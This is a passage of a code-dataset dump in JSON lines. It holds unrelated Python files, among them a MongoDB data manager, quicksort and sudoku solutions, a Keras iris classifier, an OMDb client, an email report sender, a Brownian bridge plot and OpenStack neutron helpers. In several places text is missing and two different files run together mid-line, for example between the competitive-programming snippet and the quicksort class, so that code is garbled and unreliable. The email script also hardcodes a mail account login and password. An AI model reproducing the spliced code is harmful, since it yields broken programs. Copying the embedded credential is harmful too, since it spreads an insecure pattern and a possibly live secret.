self.transaction_manager.get().join(self)\n self._needs_to_join = False\n self._reader.set_ghost_state(obj)\n self._loaded_objects.append(obj)\n\n def oldstate(self, obj, tid):\n # I cannot find any code using this method. Also, since we do not keep\n # version history, we always raise an error.\n raise KeyError(tid)\n\n def register(self, obj):\n if self._needs_to_join:\n self.transaction_manager.get().join(self)\n self._needs_to_join = False\n\n if obj is not None and obj not in self._registered_objects:\n self._registered_objects.append(obj)\n\n def abort(self, transaction):\n self.reset()\n\n def commit(self, transaction):\n if not self.detect_conflicts:\n return\n # Check each modified object to see whether Mongo has a new version of\n # the object.\n for obj in self._registered_objects:\n # This object is not even added to the database yet, so there\n # cannot be a conflict.\n if obj._p_oid is None:\n continue\n db_name, coll_name = self._writer.get_collection_name(obj)\n coll = self._conn[db_name][coll_name]\n new_doc = coll.find_one(obj._p_oid.id, fields=('_py_serial',))\n if new_doc is None:\n continue\n if new_doc.get('_py_serial', 0) != serialize.u64(obj._p_serial):\n raise self.conflict_error_factory(obj, new_doc)\n\n def tpc_begin(self, transaction):\n pass\n\n def tpc_vote(self, transaction):\n pass\n\n def tpc_finish(self, transaction):\n written = []\n for obj in self._registered_objects:\n if getattr(obj, '_p_mongo_sub_object', False):\n obj = obj._p_mongo_doc_object\n if obj in written:\n continue\n self._writer.store(obj)\n written.append(obj)\n self.reset()\n\n def tpc_abort(self, transaction):\n self.abort(transaction)\n\n def sortKey(self):\n return ('MongoDataManager', 0)\n","sub_path":"mongopersist/tags/0.5.4/src/mongopersist/datamanager.py","file_name":"datamanager.py","file_ext":"py","file_size_in_byte":6492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"526058618","text":"\n\n\n\nif __name__ == '__main__':\n\tf = open('A-small-attempt0.in', 'r')\n\tg = open('output.txt', 'w')\n\tT = int(f.readline())\n\n\tfor caseNum in range(T):\n\t\tline1 = int(f.readline())\n\t\tline2 = f.readline()\n\t\tnums = [int(c) for c in line2.split()]\n\t\tx = 0\n\t\tfor i in range(len(nums)-1):\n\t\t\tif(nums[i+1]= pivotKey:\n right -= 1\n while left < right and self.__resultList[left] <= pivotKey:\n left += 1\n self.__swap(left, right)\n self.__swap(pivotPointer, left)\n return left\n\n def __sort(self, left, right):\n if left >= right:\n return\n pivotPosition = self.__partition(left, right)\n self.__sort(left, pivotPosition - 1)\n self.__sort(pivotPosition + 1, right)\n\n def __swap(self, left, right):\n self.__resultList[left], self.__resultList[right] = self.__resultList[right], self.__resultList[left]\n\nclass TestSolution(unittest.TestCase):\n def setUp(self):\n self.quick_sort_solution = Solution()\n\n def tearDown(self):\n pass\n\n def test_quick_sort_normal(self):\n a1_list = [5, 3, 8, 6, 4]\n a2_list = [15, 198, 2, 0, -18, 1000, 120]\n self.assertEqual(self.quick_sort_solution.quick_sort(a1_list), [3, 4, 5, 6, 8])\n self.assertEqual(self.quick_sort_solution.quick_sort(a2_list), [-18, 0, 2, 15, 120, 198, 1000])\n\n def test_quick_sort_none(self):\n none_list = None\n self.assertEqual(self.quick_sort_solution.quick_sort(none_list), [])\n\n def test_quick_sort_empty(self):\n empty_list = None\n self.assertEqual(self.quick_sort_solution.quick_sort(empty_list), [])\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"sort/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"95307822","text":"#!/usr/bin/env python3\n\n#https://codeforces.com/problemset/problem/1176/C\n#最少移除的数字,使得剩余6l个数可以分为l个子序列[4,8,15,16,23,42]\n#贪心?\n\nn = int(input()) #5e5\nal = list(map(int,input().split()))\n\nrl = [4,8,15,16,23,42]\ncl = [0]*6\nfor i in range(n):\n p = rl.index(al[i])\n if p==0 or cl[p] None:\n # 对 board[i][j] 进行穷举尝试\n def backtrack(board, i, j):\n m, n = 9, 9\n if j == n: # 走到9才越界,进入下一行\n return backtrack(board, i+1, 0)\n if i == m: # 走到最后一行,找到一个可行解\n return True\n if board[i][j] != '.': # 当前是预设数字,直接跳到下一个\n return backtrack(board, i, j+1)\n\n ch_list = ['1','2','3','4','5','6','7','8','9']\n for ch in ch_list:\n if not isValid(board, i, j, ch): # 如果遇到不合法的数字,则跳过\n continue\n\n board[i][j] = ch # 做选择\n if backtrack(board, i, j+1): # 如果找到一个可行解,立即结束\n return True\n board[i][j] = '.' # 撤销选择\n # 穷举完 1~9,依然没有找到可行解,此路不通\n return False\n\n # 判断 board[i][j] 是否可以填入 n\n def isValid(board, r, c, n):\n for i in range(9):\n # 判断行是否存在重复\n if board[r][i] == n: return False\n # 判断列是否存在重复\n if board[i][c] == n: return False\n # 判断 3 * 3 方框是否存在重复\n if board[(r//3)*3 + i//3][(c//3)*3 + i%3] == n:\n return False\n return True\n\n backtrack(board, 0, 0)","sub_path":"37_解数独.py","file_name":"37_解数独.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"254805415","text":"import bpy\n\nbl_info = {\"name\": \"Align Shapes x\",\n \"author\": \"Team Cobra\",\n \"location\": \"View3D > Align > Shape > x axis\",\n \"version\": (1, 0, 0),\n \"blender\": (2, 80, 0),\n \"description\": \"Align shapes along the x axis\",\n \"category\": \"Align Shape\", }\n\n\nclass AlignShapesx(bpy.types.Operator):\n bl_idname = \"action.align_shapesx\"\n bl_label = \"Align Shapes x\"\n\n def invoke(self, context, event):\n i = 0\n # in order to change spacing between objects, change the number that i is multiplied by in the for loop\n for object in list(bpy.context.collection.objects):\n object.select_set(state=True)\n object.location.x = i*10\n object.location.y = 0\n object.location.z = 0\n object.select_set(state=False)\n i += 1\n return {\"FINISHED\"}\n\n\nclasses = (AlignShapesx,)\n\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n\ndef unregister():\n for cls in reversed(classes):\n bpy.utils.unregister_class(cls)\n","sub_path":"AlignShapesx.py","file_name":"AlignShapesx.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"532124015","text":"import sys\nimport argparse\nimport os\nimport initialize\nimport subprocess\n\nparser = argparse.ArgumentParser(description='Tools to help create and open python files')\nparser.add_argument('pyname', nargs='?', type=str)\nparser.add_argument('-s', '--project_type', nargs='?', type=str, const='script', choices=['project', 'script'],\n default='project', help='Project or script?')\nargs = parser.parse_args()\n\n# Check if config.ini has been created\nif os.path.exists('config.ini') is False:\n initialize.create_config()\n exit()\nelse:\n from initialize import path\n\n# Checks that there is at least one argument\nif len(sys.argv) == 1:\n print('ERROR: Input at least one argument')\n exit()\n\n# Sets the directories based on -s, --project_type\nactive_dir = \"\"\ntry:\n if args.project_type == 'project':\n active_dir = path['project_dir']\n os.chdir(active_dir)\n if args.project_type == 'script':\n active_dir = path['script_dir']\n os.chdir(active_dir)\nexcept OSError:\n print('ERROR: Set your paths in the Config.ini file')\n os.system('config.ini')\n exit()\n\nfolder = active_dir + r'\\%s' % args.pyname\nsubprocess.Popen([path['ide_path'], folder])\n","sub_path":"pyopen.py","file_name":"pyopen.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"89483673","text":"import os\nimport re\nimport csv\nfrom collections import defaultdict\n\n\nfilename_regex = re.compile(r\"^[a-z]+\\/(\\d+)-(\\d+)-\\d+.out\", flags=re.I)\n\n\ndef parse_metrics_file(f, metrics):\n lines = [l.strip() for l in open(f, \"r\").readlines()]\n start_idx = 0\n\n for line in lines:\n if \"overflow\" in line:\n print(\"overflowed in\", f)\n return\n if \"Warning\" in line:\n print(\"failed something\", f)\n return\n\n key = tuple(int(i) for i in filename_regex.findall(f)[0])\n entry = {}\n\n for i, row in enumerate(lines):\n if row.startswith(\"Kernel: find_hash(int, int)\"):\n start_idx = i+1\n\n for row in lines[start_idx:]:\n items = row.split()\n metric = items[1]\n val_candidate = list(\n filter(None, [x.strip() for x in items[-1].split(\"%\")]))[0]\n val = float(val_candidate)\n entry[metric] = val\n\n metrics[key].append(entry)\n\n\ndef average_metrics_results(metrics):\n parsed_metrics = {}\n\n for run, results in metrics.items():\n metrics_types = results[0].keys()\n average_results = {}\n\n for metric in metrics_types:\n total = 0\n for r in results:\n total += r[metric]\n\n average_results[metric] = total / len(results)\n\n parsed_metrics[run] = average_results\n\n return parsed_metrics\n\n\ndef parse_metrics_files():\n metrics = defaultdict(list)\n\n for f in os.listdir(\"./metrics\"):\n fn = \"metrics/\" + f\n\n if f.endswith(\".out\"):\n try:\n parse_metrics_file(fn, metrics)\n except Exception as e:\n print(e)\n print(fn)\n\n parsed_results = average_metrics_results(metrics)\n\n keys = list(parsed_results.values())[0].keys()\n return parsed_results\n\n\ndef parse_timings_file(f, timings):\n lines = [l.strip() for l in open(f, \"r\").readlines()]\n\n for line in lines:\n if \"overflow\" in line:\n print(\"overflowed in\", f)\n return\n if \"Warning\" in line:\n print(\"failed something\", f)\n return\n\n key = tuple(int(i) for i in filename_regex.findall(f)[0])\n\n for row in lines:\n if \"find_hash(int, int)\" in row:\n elements = row.replace(\"find_hash(int, int)\", \"\").strip().split()\n avg_timing = elements[-3]\n\n if \"ms\" in avg_timing:\n factor = 1\n avg_timing = avg_timing.replace(\"ms\", \"\")\n elif \"us\" in avg_timing:\n factor = 0.001\n avg_timing = avg_timing.replace(\"us\", \"\")\n elif \"s\" in avg_timing:\n factor = 1000\n avg_timing = avg_timing.replace(\"s\", \"\")\n\n parsed_timing = float(avg_timing) * factor\n\n timings[key].append(parsed_timing)\n return\n\n\ndef average_timings_results(timings):\n parsed_timings = {}\n\n for run, results in timings.items():\n average_results = sum(results)/len(results)\n\n parsed_timings[run] = {\"total_time\": average_results}\n\n return parsed_timings\n\n\ndef parse_timings_files():\n timings = defaultdict(list)\n\n for f in os.listdir(\"./memory\"):\n fn = \"memory/\" + f\n\n if f.endswith(\".out\"):\n try:\n parse_timings_file(fn, timings)\n except Exception as e:\n print(e)\n print(fn)\n\n parsed_results = average_timings_results(timings)\n\n return parsed_results\n\n\ndef parse_event_file(f, events):\n lines = [l.strip() for l in open(f, \"r\").readlines()]\n start_idx = 0\n\n for line in lines:\n if \"overflow\" in line:\n print(\"overflowed in\", f)\n return\n if \"Warning\" in line:\n print(\"failed something\", f)\n return\n\n key = tuple(int(i) for i in filename_regex.findall(f)[0])\n\n entry = {}\n\n for i, row in enumerate(lines):\n if row.startswith(\"Kernel: find_hash(int, int)\"):\n start_idx = i+1\n\n for row in lines[start_idx:]:\n items = row.split()\n event = items[1]\n val = float(items[-1])\n entry[event] = val\n\n events[key].append(entry)\n\n\ndef average_event_results(events):\n parsed_events = {}\n\n for run, results in events.items():\n event_types = results[0].keys()\n average_results = {}\n\n for event in event_types:\n total = 0\n for r in results:\n total += r[event]\n\n average_results[event] = total / len(results)\n\n parsed_events[run] = average_results\n\n return parsed_events\n\n\ndef parse_event_files():\n events = defaultdict(list)\n\n for f in os.listdir(\"./events\"):\n if f.endswith(\".out\"):\n fn = \"events/\" + f\n try:\n parse_event_file(fn, events)\n except Exception as e:\n print(e)\n print(fn)\n\n parsed_results = average_event_results(events)\n\n keys = list(parsed_results.values())[0].keys()\n\n return parsed_results\n\n\ndef combine_results(*results):\n if not results:\n return\n\n combined = defaultdict(dict)\n runs = results[0].keys()\n\n for run in runs:\n for res in results:\n combined[run].update(res[run])\n\n csv_file = open(\"combined.csv\", \"w\")\n writer = csv.writer(csv_file)\n keys = list(combined.values())[0].keys()\n writer.writerow([\"blocks\", \"threads\", \"blocks_times_threads\"] + list(keys))\n for k, v in combined.items():\n blocks, threads = k\n row = [blocks, threads, blocks * threads]\n for e in keys:\n row.append(v.get(e))\n\n writer.writerow(row)\n csv_file.close()\n\n\nif __name__ == \"__main__\":\n print(\"parsing metrics\")\n metrics = parse_metrics_files()\n print(\"parsing timings\")\n timings = parse_timings_files()\n print(\"parsing events\")\n events = parse_event_files()\n print(\"combining results\")\n combine_results(timings, metrics, events)\n","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507435529","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jan 4 09:51:50 2019\r\n\r\n@author: Jikhan Jeong\r\n\"\"\"\r\n\r\n## 2019 Spring, Mulit_calss_Iris\r\n## reference : https://github.com/gilbutITbook/006958\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\nimport numpy\r\nimport tensorflow as tf\r\nimport pandas as pd\r\n\r\n## Setting for handling randomness to generate the same results in each trials\r\nseed = 0\r\nnumpy.random.seed(seed)\r\ntf.set_random_seed(seed)\r\n\r\ndf = pd.read_csv(\"C:/python/a_python/2019_Spring_Deep_learning/dataset/iris.csv\",\r\n names = [\"sepal_length\",\"sepal_width\",\"petal_length\",\"petal_width\",\"species\"])\r\n\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nsns.pairplot(df, hue='species');\r\nplt.show()\r\n\r\ndataset = df.values\r\nX = dataset[:,0:4].astype(float)\r\nY_obj = dataset[:,4] # string values for classes, 3 classes\r\ntype(Y_obj)\r\n\r\nfrom sklearn.preprocessing import LabelEncoder\r\ne = LabelEncoder()\r\ne.fit(Y_obj)\r\nY = e.transform(Y_obj) # string to numerical \r\n\r\nfrom keras.utils import np_utils\r\nY_encoded = np_utils.to_categorical(Y) # one-hot encoding\r\n\r\nmodel = Sequential()\r\nmodel.add(Dense(16, input_dim=4, activation = 'relu')) # input and hidden 1 layer\r\nmodel.add(Dense(3, activation ='softmax')) # output layer, softmax is used\r\n\r\nmodel.compile(loss ='categorical_crossentropy', # because it is multicalss problem\r\n optimizer ='adam',\r\n metrics=['accuracy'])\r\n\r\nmodel.fit(X,Y_encoded, epochs =50, batch_size= 1) # Excuting the model\r\n\r\nprint(\"\\n Accuracy: %.4f\" % (model.evaluate(X,Y_encoded)[1]))\r\n\r\n","sub_path":"2019 Spring, Iris.py","file_name":"2019 Spring, Iris.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"147568753","text":"import requests as req\r\n\r\n\r\nAPI_KEY = 'Your_api_key_here'\r\n\r\ndef search_by_title(movie_title):\r\n url = \"http://www.omdbapi.com/?apikey={}&t={}\".format(API_KEY, movie_title)\r\n retorno = req.get(url).json()\r\n d = {}\r\n\r\n if retorno['Response'] == 'True':\r\n\r\n d['year'] = retorno['Year']\r\n d['title'] = retorno['Title']\r\n d['director'] = retorno['Director']\r\n d['genre'] = retorno['Genre']\r\n d['poster'] = retorno['Poster']\r\n d['actors'] = retorno['Actors']\r\n\r\n if retorno['Ratings'][0]['Value'] == \"N/A\":\r\n d['internet_movie_database'] = None\r\n\r\n else:\r\n d['internet_movie_database'] = retorno['Ratings'][0]['Value']\r\n \r\n if retorno['Ratings'][1]['Value'] == \"N/A\":\r\n d['rotte_tomatoes'] = None\r\n\r\n else:\r\n d['rotten_tomatoes'] = retorno['Ratings'][1]['Value']\r\n\r\n if retorno['Ratings'][2]['Value'] == \"N/A\":\r\n d['metacritic'] = None\r\n \r\n else:\r\n d['metacritic'] = retorno['Ratings'][2]['Value']\r\n\r\n return d\r\n","sub_path":"omdb.py","file_name":"omdb.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"412865001","text":"import argparse\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.externals import joblib\nimport os\nimport pandas as pd\nimport sys\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # Get train test split ratio\n parser.add_argument(\"--test-ratio\", type=float, default=0.2)\n parser.add_argument(\"--random-state\", type=int, default=42)\n\n # Get tree parameters\n parser.add_argument(\"--criterion\", type=str, default=\"mse\")\n parser.add_argument(\"--splitter\", type=str, default=\"best\")\n parser.add_argument(\"--max-depth\", type=int, default=None)\n parser.add_argument(\"--min-samples-split\", type=float, default=2)\n parser.add_argument(\"--min-samples-leaf\", type=float, default=1)\n parser.add_argument(\"--min-weight-fraction-leaf\", type=float, default=0.0)\n parser.add_argument(\"--max-features\", type=float, default=None)\n parser.add_argument(\"--max-leaf-nodes\", type=int, default=None)\n parser.add_argument(\"--min-impurity-decrease\", type=float, default=0)\n\n # Parser environment variables by Amazon Sagemaker\n parser.add_argument('--output-data-dir', type=str, default=os.environ.get('SM_OUTPUT_DATA_DIR'))\n parser.add_argument('--model-dir', type=str, default=os.environ.get('SM_MODEL_DIR'))\n parser.add_argument('--train', type=str, default=os.environ.get('SM_CHANNEL_TRAIN'))\n\n # Parse all arguments\n args, _ = parser.parse_known_args()\n\n # Split into X and y\n input_files = [ os.path.join(args.train, file) for file in os.listdir(args.train) ]\n if len(input_files) == 0:\n raise ValueError(('There are no files in {}.\\n' +\n 'This usually indicates that the channel ({}) was incorrectly specified,\\n' +\n 'the data specification in S3 was incorrectly specified or the role specified\\n' +\n 'does not have permission to access the data.').format(args.train, \"train\"))\n raw_data = [ pd.read_csv(file, header=None, engine=\"python\", skiprows=1 ) for file in input_files ]\n train_data = pd.concat(raw_data)\n\n # Split into X and y\n train_data = train_data.values\n X = train_data[:, :-1]\n y = train_data[:, -1]\n\n # Split into train and test set\n X_train, X_test, y_train, y_test = train_test_split(\n X, y,\n test_size=args.test_ratio,\n random_state=args.random_state\n )\n\n # Create model and train using training set\n clf = DecisionTreeRegressor(\n criterion=args.criterion,\n splitter=args.splitter,\n max_depth=args.max_depth,\n min_samples_split=args.min_samples_split,\n min_samples_leaf=args.min_samples_leaf,\n min_weight_fraction_leaf=args.min_weight_fraction_leaf,\n max_features=args.max_features,\n max_leaf_nodes=args.max_leaf_nodes,\n min_impurity_decrease=args.min_impurity_decrease\n )\n clf.fit(X_train, y_train)\n\n # Make predictions\n y_train_prediction = clf.predict(X_train)\n y_test_prediction = clf.predict(X_test)\n\n # Calculate f1 score\n train_mse = mean_squared_error(y_train, y_train_prediction)\n test_mse = mean_squared_error(y_test, y_test_prediction)\n\n # Emit metrics\n sys.stdout.write(f\"Train_mse={train_mse};\")\n sys.stdout.write(f\"Test_mse={test_mse};\")\n\n # Save model to dir\n joblib.dump(clf, os.path.join(args.model_dir, \"model.joblib\"))\n\n\n# Model function to load the model\ndef model_fn(model_dir):\n clf = joblib.load(os.path.join(model_dir, \"model.joblib\"))\n return clf","sub_path":"Backend/mlmodels/scripts/decision_tree_regression_script.py","file_name":"decision_tree_regression_script.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"354673324","text":"import os\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\ndef send_mail(file_new):\n # 找到html复制到邮件上\n f = open(file_new)\n mail_body = f.read()\n f.close()\n msg=MIMEMultipart()\n msg[\"subject\"] = \"接口测试报告\" #主题\n # # 正文\n # body = MIMEText(mail_body, \"html\", \"utf-8\")\n # msg.attach(body)\n # 附件\n att=MIMEText(mail_body, \"base64\", \"utf-8\")\n att[\"Content-Type\"] = \"application/octet-stream\"\n att[\"Content-Disposition\"] = 'attachment; filename=\"测试报告.html\"'\n msg.attach(att)\n # 发送邮件\n smtp = smtplib.SMTP()\n smtp.connect('smtp.163.com')\n smtp.login('18230149962@163.com','qwe123456.')\n smtp.sendmail('18230149962@163.com','18230149962@163.com',msg.as_string())\n smtp.quit()\n\n print('邮件已发送')\n\n\n\n\nif __name__ == '__main__':\n file_path = \"D:\\\\chengan\\\\doraemon\\src\\\\report\\\\测试报告.html\"\n lists = os.path.dirname(file_path)\n file_new = os.path.split(file_path)[-1]\n send_mail(file_new)","sub_path":"test/interface/rlg.py","file_name":"rlg.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"354729366","text":"from geomutils import midpoint\nfrom math import sqrt\nfrom numpy.random import normal\nimport matplotlib.pyplot as plt\nimport matplotlib.collections\nimport argparse\n\nTOLERANCE = 0.01 #epsilon\n\ndef brownian_bridge(frm, to, variance, scale):\n points = []\n if abs(to[0] - frm[0]) < TOLERANCE:\n points += [(frm ,to)]\n else:\n m = midpoint(frm,to)\n rand_height = normal(0,sqrt(variance))\n m = m[0], m[1] +rand_height\n points += brownian_bridge(frm, m, variance/scale, scale)\n points += brownian_bridge(m, to, variance/scale, scale)\n return points\n\ndef brownian_island(frm, to, variance, scale, n):\n if n == 0:\n return [(frm, to)]\n m = midpoint(frm,to)\n rand_height = normal(0,sqrt(variance))\n rand_width = normal(0,sqrt(variance))\n m = m[0] + rand_width, m[1] +rand_height\n points = []\n points += brownian_island(frm, m, variance/scale, scale, n-1)\n points += brownian_island(m, to, variance/scale, scale, n-1)\n return points\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Draw a brownian bridge or island')\n parser.add_argument('hurst_exponent', type=float, help='Hurst exponent : controls smoothness')\n parser.add_argument('--volatility', type=float, help='volatility as variance')\n\n args = parser.parse_args()\n hurst_exponent = args.hurst_exponent\n if args.volatility:\n volatility = args.volatility\n else:\n volatility = 0.01\n\n scale = 2**(2*hurst_exponent)\n # scale = 2.7\n # ps = brownian_bridge((0,1/2),(1,1/2), volatility, scale)\n ps = brownian_island((1/2,1/2),(1/2,1/2), volatility, scale, 10) #Enter volatility 0.75 from commandline\n\n lc = matplotlib.collections.LineCollection(ps)\n fig, ax = plt.subplots(1,1)\n ax.axis('equal')\n ax.add_collection(lc)\n ax.set_xlim([0,1])\n ax.set_ylim([0,1])\n ax.set_title('Brownian bridge')\n plt.show()\n","sub_path":"brownian_bridge.py","file_name":"brownian_bridge.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589433792","text":"\"\"\"\nDefines cage topologies of building blocks with 3 functional groups.\n\n\"\"\"\n\nimport numpy as np\nfrom scipy.spatial.distance import euclidean\n\nfrom .base import NoLinkerCageTopology, Vertex\n\n\nclass OnePlusOne(NoLinkerCageTopology):\n \"\"\"\n A sandwich cage topology from tri-functionalised building blocks.\n\n \"\"\"\n\n x = 1\n positions_A = [Vertex(x, 0., 0.),\n Vertex(-x, 0., 0.)]\n a, b = positions_A\n connections = [(a, b)]\n\n a.edge_plane_normal = lambda scale: scale*np.array([1, 0, 0])\n b.edge_plane_normal = lambda scale: scale*np.array([-1, 0, 0])\n\n a.edge_centroid = lambda scale: scale*np.array([0, 0, 0])\n b.edge_centroid = lambda scale: scale*np.array([0, 0, 0])\n\n n_windows = 3\n n_window_types = 1\n\n def bonded_fgs(self, macro_mol):\n\n for position in self.positions_A:\n other_position = next(x for x in self.positions_A if\n x is not position)\n\n position.fg_position_pairs = [\n (fg, other_position) for fg in position.fgs\n ]\n\n for fg1, vertex in position.fg_position_pairs:\n # Get all the distances between the fg and the fgs\n # on the vertex. Store this information on the vertex.\n\n for fg2 in vertex.fgs:\n c1 = macro_mol.atom_centroid(fg1.bonder_ids)\n c2 = macro_mol.atom_centroid(fg2.bonder_ids)\n distance = euclidean(c1, c2)\n position.distances.append((distance, fg1, fg2))\n\n paired = set()\n for position in self.positions_A:\n for _, fg1, fg2 in sorted(position.distances):\n if fg1 in paired or fg2 in paired:\n continue\n\n # Add the bond.\n yield fg1, fg2\n paired.add(fg1)\n paired.add(fg2)\n\n\nclass TwoPlusTwo(NoLinkerCageTopology):\n \"\"\"\n Tetrahedral cage topology from tri-functionalised building blocks.\n\n \"\"\"\n\n x = 1\n positions_A = [Vertex(x, 0, -x/np.sqrt(2)),\n Vertex(-x, 0, -x/np.sqrt(2)),\n Vertex(0, x, x/np.sqrt(2)),\n Vertex(0, -x, x/np.sqrt(2))]\n\n a, b, c, d = positions_A\n\n for x in positions_A:\n old_normal = x.edge_plane_normal\n x.edge_plane_normal = lambda scale, a=old_normal: -1*a(scale)\n\n connections = [(a, b), (a, c), (a, d),\n (b, c), (b, d),\n (c, d)]\n\n n_windows = 4\n n_window_types = 1\n\n\nclass FourPlusFour(NoLinkerCageTopology):\n \"\"\"\n A square cage topology from tri-functionalised building blocks.\n\n \"\"\"\n\n x = 1\n positions_A = [Vertex(-x, x, -x),\n Vertex(-x, -x, -x),\n Vertex(x, x, -x),\n Vertex(x, -x, -x),\n\n Vertex(-x, x, x),\n Vertex(-x, -x, x),\n Vertex(x, x, x),\n Vertex(x, -x, x)]\n\n a, b, c, d, e, f, g, h = positions_A\n\n connections = [(a, b), (a, c), (a, e), (b, d), (b, f), (c, g),\n (c, d), (d, h), (e, g), (e, f), (f, h), (g, h)]\n\n n_windows = 6\n n_window_types = 1\n","sub_path":"stk/molecular/topologies/cage/three_plus_three.py","file_name":"three_plus_three.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207723224","text":"# Copyright 2019 Red Hat\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nfrom __future__ import absolute_import\n\nfrom tobiko.openstack.neutron import _agent\nfrom tobiko.openstack.neutron import _client\nfrom tobiko.openstack.neutron import _cidr\nfrom tobiko.openstack.neutron import _extension\nfrom tobiko.openstack.neutron import _floating_ip\nfrom tobiko.openstack.neutron import _port\nfrom tobiko.openstack.neutron import _quota_set\nfrom tobiko.openstack.neutron import _network\nfrom tobiko.openstack.neutron import _router\nfrom tobiko.openstack.neutron import _subnet\n\n\nSERVER = 'neutron-server'\nDHCP_AGENT = _agent.DHCP_AGENT\nL3_AGENT = _agent.L3_AGENT\nMETADATA_AGENT = _agent.METADATA_AGENT\nOPENVSWITCH_AGENT = _agent.OPENVSWITCH_AGENT\nOVN_CONTROLLER = _agent.OVN_CONTROLLER\nOVN_METADATA_AGENT = _agent.OVN_METADATA_AGENT\nNEUTRON_OVN_METADATA_AGENT = _agent.NEUTRON_OVN_METADATA_AGENT\nAgentNotFoundOnHost = _agent.AgentNotFoundOnHost\nNeutronAgentType = _agent.NeutronAgentType\nget_l3_agent_mode = _agent.get_l3_agent_mode\nfind_l3_agent_hosting_router = _agent.find_l3_agent_hosting_router\nlist_agents = _agent.list_agents\nlist_dhcp_agent_hosting_network = _agent.list_dhcp_agent_hosting_network\nlist_l3_agent_hosting_routers = _agent.list_l3_agent_hosting_routers\nlist_networking_agents = _agent.list_networking_agents\nskip_if_missing_networking_agents = _agent.skip_if_missing_networking_agents\nskip_unless_is_ovn = _agent.skip_unless_is_ovn\nskip_unless_is_ovs = _agent.skip_unless_is_ovs\nskip_if_is_old_ovn = _agent.skip_if_is_old_ovn\nhas_ovn = _agent.has_ovn\nhas_ovs = _agent.has_ovs\n\nNeutronClientFixture = _client.NeutronClientFixture\nServiceUnavailable = _client.ServiceUnavailable\nNeutronClient = _client.NeutronClient\nNeutronClientException = _client.NeutronClientException\nNeutronClientType = _client.NeutronClientType\nneutron_client = _client.neutron_client\nget_neutron_client = _client.get_neutron_client\n\nnew_ipv4_cidr = _cidr.new_ipv4_cidr\nnew_ipv6_cidr = _cidr.new_ipv6_cidr\nlist_subnet_cidrs = _cidr.list_subnet_cidrs\n\nget_networking_extensions = _extension.get_networking_extensions\nmissing_networking_extensions = _extension.missing_networking_extensions\nhas_networking_extensions = _extension.has_networking_extensions\nskip_if_missing_networking_extensions = (\n _extension.skip_if_missing_networking_extensions)\n\ncreate_floating_ip = _floating_ip.create_floating_ip\ndelete_floating_ip = _floating_ip.delete_floating_ip\nget_floating_ip = _floating_ip.get_floating_ip\nget_floating_ip_id = _floating_ip.get_floating_ip_id\nfind_floating_ip = _floating_ip.find_floating_ip\nlist_floating_ips = _floating_ip.list_floating_ips\nupdate_floating_ip = _floating_ip.update_floating_ip\nFloatingIpType = _floating_ip.FloatingIpType\nFloatingIpIdType = _floating_ip.FloatingIpIdType\nNoSuchFloatingIp = _floating_ip.NoSuchFloatingIp\n\ncreate_port = _port.create_port\ndelete_port = _port.delete_port\nget_port = _port.get_port\nget_port_id = _port.get_port_id\nfind_device_ip_address = _port.find_device_ip_address\nfind_port = _port.find_port\nfind_port_ip_address = _port.find_port_ip_address\nlist_ports = _port.list_ports\nlist_port_ip_addresses = _port.list_port_ip_addresses\nlist_device_ip_addresses = _port.list_device_ip_addresses\nupdate_port = _port.update_port\nPortType = _port.PortType\nPortIdType = _port.PortIdType\nNoSuchPort = _port.NoSuchPort\n\nget_neutron_quota_set = _quota_set.get_neutron_quota_set\nset_neutron_quota_set = _quota_set.set_neutron_quota_set\nensure_neutron_quota_limits = _quota_set.ensure_neutron_quota_limits\nEnsureNeutronQuotaLimitsError = _quota_set.EnsureNeutronQuotaLimitsError\n\ncreate_network = _network.create_network\ndelete_network = _network.delete_network\nget_network = _network.get_network\nget_network_id = _network.get_network_id\nfind_network = _network.find_network\nlist_networks = _network.list_networks\nlist_network_nameservers = _network.list_network_nameservers\nNoSuchNetwork = 